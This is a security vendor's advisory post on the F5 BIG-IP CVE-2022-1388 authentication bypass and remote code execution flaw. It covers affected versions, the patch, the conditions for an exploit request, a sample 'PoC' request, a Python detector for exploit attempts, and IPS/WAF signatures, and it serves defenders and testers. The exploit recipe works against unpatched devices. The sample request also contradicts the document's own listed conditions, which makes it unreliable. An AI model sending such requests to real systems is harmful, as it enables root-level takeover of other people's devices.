Simulating and Preventing F5 BIG-IP CVE-2022-1388 RCE Exploits
On May 18th, 2022, The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory on the remote code execution (CVE-2022-1388) vulnerability found in the F5 BIG-IP products [1]. When exploited, the CVE-2022-1388 vulnerability allows attackers to run arbitrary code and gain control of affected products.
Picus Labs has updated the Picus Threat Library with simulations for CVE-2022-1388 vulnerability exploitation attacks affecting F5 BIG-IP products.
Start simulating CVE-2022-1388 attacks with a 14-Day Free Trial of the Picus Platform
What Is the CVE-2022-1388 Vulnerability?
F5 Networks published information about the CVE-2022-1388 remote code execution vulnerability on May 4th, 2022 [2]. An unauthenticated adversary with network access may exploit the CVE-2022-1388 vulnerability to execute arbitrary commands through the management port or a self-IP address.
The "/mgmt/tm/util/bash" service in F5 BIG-IP is a feature that allows users to run commands as the root user of the BIG-IP. The service does not require a password or authentication. Therefore, if adversaries have network access to affected F5 BIG-IP products, they can execute commands remotely with elevated privileges.
What Is the Impact of the CVE-2022-1388 Vulnerability?
48 of the Fortune 50 companies use F5 products. Due to its wide use, the exploitation of CVE-2022-1388 may have serious consequences. Since the vulnerability allows unauthenticated attackers to execute arbitrary code on F5 BIG-IP products, the CVSSv3 base score for CVE-2022-1388 is 9.8 Critical.
The CVE-2022-1388 vulnerability enables remote code execution on systems running vulnerable F5 BIG-IP versions and gives the attacker complete control of the affected server. For example, attackers can exploit CVE-2022-1388 to run malicious code and install webshells as backdoors on vulnerable systems to maintain access and carry out post-exploitation activity.
Which F5 BIG-IP Versions Are Affected?
Affected and fixed F5 BIG-IP versions are shown in the below table:
| Affected Versions | Fixed Version |
| --- | --- |
| 16.1.0 - 16.1.2 | 16.1.2.2 |
| 15.1.0 - 15.1.5 | 15.1.5.1 |
| 14.1.0 - 14.1.4 | 14.1.4.6 |
| 13.1.0 - 13.1.4 | 13.1.5 |
| 12.1.0 - 12.1.6 | Not fixed - EOL |
| 11.6.1 - 11.6.5 | Not fixed - EOL |
What Is the Current Situation?
F5 released a patch for affected products on May 4th, 2022, alongside the security advisory for the vulnerability. 17.x versions are not affected by the CVE-2022-1388 vulnerability. Since versions 12.1.x and 11.6.x are end-of-life (EOL), patches are not available for these versions.
What Should You Do?
Since F5 BIG-IP is a widely used product and public proof-of-concept (PoC) code for exploiting the CVE-2022-1388 vulnerability is available, users are advised to patch their affected products without delay.
CVE-2022-1388 F5 BIG-IP PoC Exploit
The following conditions are required to exploit the CVE-2022-1388 vulnerability:
- A POST request must be sent to the vulnerable endpoint, which is "/mgmt/tm/util/bash".
- The "X-F5-Auth-Token" header must be present.
  - Example: X-F5-Auth-Token: 0
- The "Authorization" header must contain the "admin" username and any password.
  - Example: Authorization: Basic YWRtaW46
  - "YWRtaW46" is the Base64 encoded version of "admin:", which means the username is "admin" and the password is "" (empty), which is also valid.
- The "Connection" header must contain the "X-F5-Auth-Token" header field.
  - Example: Connection: X-F5-Auth-Token
- The "Host" header must be localhost / 127.0.0.1, or the "Connection" header must include "X-Forwarded-Host".
  - Example: Connection: X-F5-Auth-Token, X-Forwarded-Host
- The value of the "command" parameter in the POST request must be "run".
  - Example: "command": "run"
- The value of the "utilCmdArgs" parameter in the POST request must be a valid Linux command.
  - Example: "utilCmdArgs": " -c 'whoami' "
Therefore, you can test your F5 BIG-IP devices against CVE-2022-1388 vulnerability exploitation attacks with the following POST request:
```http
POST /mgmt/tm/util/bash HTTP/1.1
X-F5-Auth-Token: 0
Authorization: Basic YWRtaW46
X-Forwarded-For: localhost
Content-Length: 0
```
Example Code: Proof of Concept POST request for CVE-2022-1388 exploit
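The request conditions listed above double as detection criteria. The following Python is an added example written for this post (not code from the original post or from Picus): it parses raw HTTP requests such as those exported from a reverse proxy or WAF log and reports which CVE-2022-1388 conditions each request satisfies. The two sample requests are constructed, and the alert rule only keys on the target path plus the "Connection: X-F5-Auth-Token" trick, since that pairing has no legitimate use.

```python
import base64
import json

VULN_PATH = "/mgmt/tm/util/bash"  # endpoint named in the advisory

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    first, *rest = head.split("\r\n")
    method, path, _ = first.split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (ln.partition(":") for ln in rest)}
    return method, path, headers, body

def exploit_indicators(raw):
    """Return the set of CVE-2022-1388 request conditions that this request satisfies."""
    method, path, headers, body = parse_request(raw)
    found = set()
    if method == "POST" and path.startswith(VULN_PATH):
        found.add("post_to_util_bash")
    if "x-f5-auth-token" in headers:
        found.add("x_f5_auth_token_header")
    # Listing the token header in hop-by-hop 'Connection' is the authentication bypass trick
    conn = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in conn:
        found.add("connection_drops_auth_token")
    if "x-forwarded-host" in conn or headers.get("host", "").split(":")[0] in ("localhost", "127.0.0.1"):
        found.add("local_host_or_forwarded_host")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user = base64.b64decode(auth[6:]).decode().split(":", 1)[0]
        except (ValueError, UnicodeDecodeError):
            user = ""
        if user == "admin":
            found.add("basic_auth_admin")
    try:
        params = json.loads(body) if body else {}
    except json.JSONDecodeError:
        params = {}
    if params.get("command") == "run" and "utilCmdArgs" in params:
        found.add("run_util_cmd_args")
    return found

def is_exploit_attempt(raw):
    """Alert when the vulnerable path and the Connection-header bypass coincide."""
    return {"post_to_util_bash", "connection_drops_auth_token"} <= exploit_indicators(raw)

# Constructed sample requests (not captured traffic); the second is a normal authenticated API call.
SUSPICIOUS = ("POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: 127.0.0.1\r\nX-F5-Auth-Token: 0\r\n"
              "Authorization: Basic YWRtaW46\r\nConnection: X-F5-Auth-Token, X-Forwarded-Host\r\n"
              "Content-Type: application/json\r\n\r\n"
              '{"command": "run", "utilCmdArgs": "-c \'whoami\'"}')
BENIGN = ("GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example.internal\r\n"
          "X-F5-Auth-Token: placeholder-session-token\r\nConnection: keep-alive\r\n\r\n")
```

Feed each raw request to exploit_indicators to see the full set of matched conditions; a high count on a single request from an external address is a strong signal even when the alert rule alone does not fire.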
How Does Picus Help Simulate and Prevent CVE-2022-1388 F5 BIG-IP Remote Code Execution Exploits?
We also strongly suggest simulating the CVE-2022-1388 vulnerability with Picus' The Complete Security Control Validation Platform to test the effectiveness of your security controls, such as Web Application Firewalls (WAF), Intrusion Prevention Systems (IPS), and NGFWs, against F5 BIG-IP RCE attacks. You can test your defenses against the CVE-2022-1388 vulnerability and hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for CVE-2022-1388 vulnerability:
| Threat ID | Threat Name |
| --- | --- |
| 97569 | F5 Web Attack Campaign |
This threat in Picus Threat Library also includes the following actions for previous F5 BIG-IP vulnerabilities:
| CVE | Threat Name |
| --- | --- |
| CVE-2020-5902 | F5 BIG-IP Local File Inclusion (LFI) Vulnerability |
| CVE-2020-5902 | F5 BIG-IP Remote Code Execution (RCE) Vulnerability |
Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2022-1388 F5 BIG-IP RCE and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures:
| Security Control | Signature ID | Signature Name |
| --- | --- | --- |
| Cisco Firepower NGFW | 1.57336.3 | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
| Cisco Firepower NGFW | 1.59735.2 | SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt |
| Cisco SourceFire IPS | 1.57336.3 | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
| Cisco SourceFire IPS | 1.59735.2 | SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt |
| Citrix Web App Firewall | 999945 | web-misc apache http server authentication bypass vulnerability in ap_get_basic_auth_pw() via basic authorization headers |
| Forcepoint NGFW | HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388 | |
| Forcepoint NGFW | HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service | |
| Fortigate IPS | 51543 | applications3: F5.BIG-IP.iControl.REST.Authentication.Bypass |
| F5 BIG-IP ASM | 200013045 | BIG-IP iControl REST Authentication Bypass (3) |
| Snort IPS | 1.57336.1 | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
| Snort IPS | 1.59735.2 | SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt |
| Snort IPS | 1.57336.3 | POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt |
| Trend Micro Tipping Point | 12639 | HTTP: Apache HTTP Server X-Forwarded-For Denial-of-Service |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus' The Complete Security Control Validation Platform.